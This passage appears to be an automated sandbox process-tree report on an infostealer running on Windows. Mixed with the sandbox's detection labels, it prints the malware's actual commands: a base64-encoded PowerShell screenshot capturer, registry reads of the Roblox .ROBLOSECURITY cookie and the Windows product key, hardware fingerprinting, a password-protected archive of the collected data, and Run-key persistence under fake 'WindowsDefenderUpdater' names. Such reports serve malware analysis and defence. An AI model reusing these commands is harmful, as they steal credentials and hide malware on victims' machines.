        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        27⤵
        
        PID:1016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        26⤵
        
        PID:4904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        27⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1576
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mqzol1ve\mqzol1ve.cmdline"
        28⤵
        
        PID:3584
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2E10.tmp" "c:\Users\Admin\AppData\Local\Temp\mqzol1ve\CSC387C86B1DF4744029A1BF864AB54A5FB.TMP"
        29⤵
        
        PID:5156
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        26⤵
        
        PID:1708
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        27⤵
        
        PID:5564
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
        26⤵
        
        PID:4480
        
        C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        27⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:5776
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        26⤵
        
        PID:5760
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        27⤵
        
        PID:5708
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
        26⤵
        
        PID:392
        
        C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        27⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:5768
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        26⤵
        
        PID:5552
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        27⤵
        
        PID:4056
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        26⤵
        
        PID:5980
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        27⤵
        Enumerates processes with tasklist
        
        PID:5148
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        26⤵
        
        PID:5872
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        27⤵
        
        PID:5420
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        26⤵
        
        PID:5612
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        27⤵
        
        PID:5796
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        26⤵
        
        PID:3680
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:4624
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        27⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:228
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        26⤵
        
        PID:5340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        27⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        26⤵
        
        PID:4200
        
        C:\Windows\system32\getmac.exe
        
        getmac
        27⤵
        
        PID:4740
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI16402\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\5I94M.zip" *"
        26⤵
        
        PID:5904
        
        C:\Users\Admin\AppData\Local\Temp\_MEI16402\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI16402\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\5I94M.zip" *
        27⤵
        Executes dropped EXE
        
        PID:3752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        26⤵
        
        PID:5380
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        27⤵
        
        PID:456
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        26⤵
        
        PID:5500
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        27⤵
        
        PID:6116
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        26⤵
        
        PID:4872
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        27⤵
        
        PID:2332
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        26⤵
        
        PID:732
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        27⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        26⤵
        
        PID:2544
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:5512
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        27⤵
        Detects videocard installed
        
        PID:3348
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        26⤵
        
        PID:1336
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:5396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        27⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4356
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        24⤵
        Executes dropped EXE
        
        PID:5480
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        24⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5484
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1ECE.tmp\1ECF.tmp\1ED0.bat C:\Windows\system32\java.exe"
        25⤵
        
        PID:2384
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        26⤵
        
        PID:2628
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        26⤵
        
        PID:2764
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        26⤵
        
        PID:680
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        26⤵
        
        PID:5512
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        26⤵
        
        PID:5528
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        26⤵
        Executes dropped EXE
        
        PID:5284
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        27⤵
        Executes dropped EXE
        
        PID:4624
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        26⤵
        Executes dropped EXE
        
        PID:5596
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        26⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2788
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2621.tmp\2622.tmp\2623.bat C:\Windows\system32\java.exe"
        27⤵
        
        PID:1248
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        28⤵
        Delays execution with timeout.exe
        
        PID:1256
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        28⤵
        Adds Run key to start application
        
        PID:2648
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        28⤵
        Adds Run key to start application
        
        PID:3744
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        28⤵
        
        PID:5636
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        28⤵
        
        PID:376
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        28⤵
        Executes dropped EXE
        
        PID:5704
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        29⤵
        Executes dropped EXE
        
        PID:5660
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        28⤵
        Executes dropped EXE
        
        PID:5688
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        28⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5600
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2F58.tmp\2F59.tmp\2F5A.bat C:\Windows\system32\java.exe"
        29⤵
        Drops file in System32 directory
        
        PID:5804
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        30⤵
        
        PID:5992
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        30⤵
        
        PID:744
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        30⤵
        
        PID:5380
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        30⤵
        Adds Run key to start application
        
        PID:2816
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        30⤵
        
        PID:4112
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        30⤵
        Executes dropped EXE
        
        PID:5204
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        31⤵
        Executes dropped EXE
        
        PID:5860
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        30⤵
        Executes dropped EXE
        
        PID:2128
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        30⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5276
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\362E.tmp\362F.tmp\3630.bat C:\Windows\system32\java.exe"
        31⤵
        Drops file in System32 directory
        
        PID:4364
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        32⤵
        
        PID:5356
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        32⤵
        Delays execution with timeout.exe
        
        PID:5852
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        32⤵
        
        PID:5360
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        32⤵
        
        PID:2808
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        32⤵
        
        PID:540
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        32⤵
        
        PID:5968
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        32⤵
        Executes dropped EXE
        
        PID:5972
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        33⤵
        
        PID:3460
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        32⤵
        
        PID:400
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        32⤵
        Checks computer location settings
        
        PID:5948
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3E8B.tmp\3E8C.tmp\3E8D.bat C:\Windows\system32\java.exe"
        33⤵
        
        PID:1004
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        34⤵
        
        PID:4112
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        34⤵
        
        PID:5788
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
